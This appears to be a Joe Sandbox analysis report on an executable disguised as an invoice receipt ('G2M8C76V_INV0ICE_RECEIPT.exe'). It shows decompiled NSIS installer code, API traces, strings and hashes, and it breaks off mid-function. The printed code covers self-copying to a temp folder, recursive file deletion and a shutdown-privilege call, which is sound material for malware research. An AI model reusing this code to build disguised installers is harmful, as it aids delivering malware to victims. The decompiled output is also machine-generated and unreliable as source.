									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", "C:\\Users\\hardz\\Desktop");
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\G2M8C76V_INV0ICE_RECEIPT.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x00403231
0x00403235
0x0040323d
0x0040323f
0x00403244
0x0040324f
0x00403256
0x0040325e
0x00403268
0x0040327e
0x0040328e
0x00403293
0x00403299
0x004032a0
0x004032b3
0x004032b8
0x004032ba
0x004032bc
0x004032c1
0x004032c1
0x004032d1
0x004032d7
0x00403340
0x00403340
0x00403342
0x00403344
0x00000000
0x00000000
0x004032dd
0x004032e0
0x004032e8
0x004032e8
0x004032eb
0x004032f0
0x004032f2
0x004032f2
0x004032f3
0x004032f3
0x004032f8
0x004032fb
0x00403330
0x00403335
0x0040333a
0x0040333d
0x0040333f
0x0040333f
0x0040333f
0x00000000
0x004032fd
0x004032fd
0x004032fe
0x00403301
0x00403309
0x0040330c
0x0040330e
0x0040330e
0x0040330e
0x0040330c
0x00403311
0x00403317
0x0040331f
0x00403322
0x00403324
0x00403324
0x00403324
0x00403322
0x00403327
0x0040332e
0x00403348
0x0040334b
0x00403354
0x00403359
0x00403359
0x00403364
0x0040336a
0x0040336f
0x00403371
0x00403393
0x00403398
0x0040339f
0x004033a6
0x004033aa
0x00403411
0x00403411
0x00403416
0x00403420
0x0040350b
0x00403511
0x0040351c
0x00403525
0x00403527
0x0040352c
0x0040352e
0x00403530
0x00403532
0x00403534
0x00403536
0x00403538
0x00403548
0x0040354a
0x0040354c
0x00403559
0x00403568
0x00403570
0x00403578
0x00403578
0x0040354c
0x00403538
0x00403534
0x0040357d
0x00403583
0x00403585
0x00403589
0x00403589
0x00403585
0x0040358e
0x00403593
0x00403596
0x00403598
0x00403598
0x004035a0
0x004035a0
0x0040342f
0x00403436
0x00403436
0x004033b2
0x00403401
0x00403401
0x0040340d
0x00000000
0x0040340d
0x004033bb
0x004033c8
0x004033bf
0x004033c5
0x00000000
0x00000000
0x004033c7
0x004033c7
0x004033c7
0x004033cc
0x004033ce
0x004033d6
0x00403442
0x00403456
0x00000000
0x00000000
0x0040345a
0x00403461
0x00403467
0x0040346d
0x00403475
0x00403475
0x00403483
0x0040348a
0x00403493
0x00403499
0x004034a5
0x004034ab
0x004034b5
0x004034c9
0x004034ca
0x004034cb
0x004034dc
0x004034e2
0x004034e9
0x004034ec
0x004034f2
0x004034f2
0x004034e9
0x004034f6
0x004034fc
0x004034fc
0x004034ff
0x00403500
0x00403501
0x00000000
0x00403501
0x004033d8
0x004033da
0x004033e5
0x00000000
0x00000000
0x004033ed
0x004033f8
0x004033fd
0x00000000
0x004033fd
0x00403379
0x00403385
0x0040338a
0x0040338f
0x00403391
0x00000000
0x00000000
0x00000000
0x00403391
0x00000000
0x0040332e
0x00000000
0x00000000
0x00000000
0x004032e2
0x004032e2
0x004032e2
0x004032e3
0x004032e3
0x00000000
0x004032e2
0x00000000

APIs

#17.COMCTL32 ref: 00403244
SetErrorMode.KERNELBASE(00008001), ref: 0040324F
OleInitialize.OLE32(00000000), ref: 00403256

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92

GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,00000000), ref: 004032A6
CharNextA.USER32(00000000,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,00000020), ref: 004032D1
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
DeleteFileA.KERNELBASE(1033), ref: 00403398
OleUninitialize.OLE32(00000000), ref: 00403416
ExitProcess.KERNEL32 ref: 00403436
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,00000000,00000000), ref: 00403442
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,00000000,00000000), ref: 0040344E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
CopyFileA.KERNEL32(C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe,0041F050,00000001), ref: 004034BF
CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
ExitProcess.KERNEL32 ref: 004035A0

Strings

1033, xrefs: 00403393
SeShutdownPrivilege, xrefs: 00403553
C:\Users\user\Desktop, xrefs: 00403447, 0040344C, 0040346F
Error launching installer, xrefs: 004033CE
_?=, xrefs: 004033BF
C:\Users\user\AppData\Local\Temp, xrefs: 004033F3
", xrefs: 004032F3
~nsu.tmp, xrefs: 0040343C
C:\Users\user\AppData\Local\Temp\, xrefs: 00403359, 0040335E, 00403378, 00403384, 00403441, 0040344D, 00403459, 00403460, 00403500
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403235
\Temp, xrefs: 0040337F
/D=, xrefs: 00403327
NSIS Error, xrefs: 00403284
"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" , xrefs: 00403299, 0040329F, 004033B5
C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe, xrefs: 004034BA
NCRC, xrefs: 00403311
C:\Users\user\AppData\Local\Temp, xrefs: 0040334F, 004033E8, 00403467, 00403470

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2278157092-4084538154
Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004053b5
0x004053b9
0x004053c2
0x004053c5
0x004053c8
0x004053d0
0x004053d2
0x004053d3
0x00000000
0x004053d3
0x004053e2
0x004053e2
0x004053e5
0x004053e8
0x004053fc
0x00405403
0x00405408
0x0040540a
0x0040541a
0x0040540c
0x00405412
0x00405412
0x0040541f
0x00405422
0x0040542d
0x00405433
0x00405438
0x00405448
0x0040544a
0x00405450
0x00405453
0x00405456
0x00405513
0x00405513
0x00405517
0x00405519
0x00405519
0x00405519
0x00405519
0x00000000
0x00000000
0x00000000
0x00000000
0x0040545c
0x0040545c
0x00405465
0x0040546b
0x00405470
0x00405473
0x00405475
0x00405479
0x0040547b
0x0040547b
0x00405479
0x0040547e
0x00405481
0x00405494
0x00405496
0x0040549b
0x004054a2
0x004054ba
0x004054c0
0x004054c6
0x004054c8
0x004054ed
0x004054ca
0x004054ca
0x004054ce
0x004054e2
0x004054d0
0x004054d3
0x004054d8
0x004054da
0x004054db
0x004054db
0x004054ce
0x004054a4
0x004054aa
0x004054ac
0x004054b2
0x004054b2
0x004054ac
0x00000000
0x004054a2
0x00405483
0x00405486
0x00405488
0x00000000
0x00000000
0x0040548a
0x0040548c
0x00000000
0x00000000
0x0040548e
0x00405492
0x00000000
0x00000000
0x00000000
0x004054f2
0x004054fc
0x00405502
0x00405502
0x0040550d
0x00000000
0x0040550d
0x00405424
0x0040542b
0x00000000
0x00000000
0x00000000
0x004053ea
0x004053ea
0x004053ec
0x0040551d
0x00405520
0x00405523
0x00405575
0x00405575
0x00405575
0x00405525
0x00405528
0x00405533
0x00405538
0x0040553a
0x00000000
0x00000000
0x0040553d
0x00405543
0x00405549
0x0040554f
0x00405551
0x00000000
0x0040556d
0x00405553
0x00405557
0x00000000
0x00000000
0x0040555c
0x00405561
0x00405562
0x00000000
0x00405563
0x0040552a
0x0040552a
0x00000000
0x0040552a
0x004053f2
0x004053f6
0x00000000
0x00000000
0x00000000
0x004053f6

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,74E5F560), ref: 004053C8
lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,74E5F560), ref: 00405412
lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,74E5F560), ref: 00405433
lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,74E5F560), ref: 00405439
FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" ,74E5F560), ref: 0040544A
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
FindClose.KERNEL32(?), ref: 0040550D

Strings

\*.*, xrefs: 0040540C
"C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" , xrefs: 004053B4
C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1293769328
Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
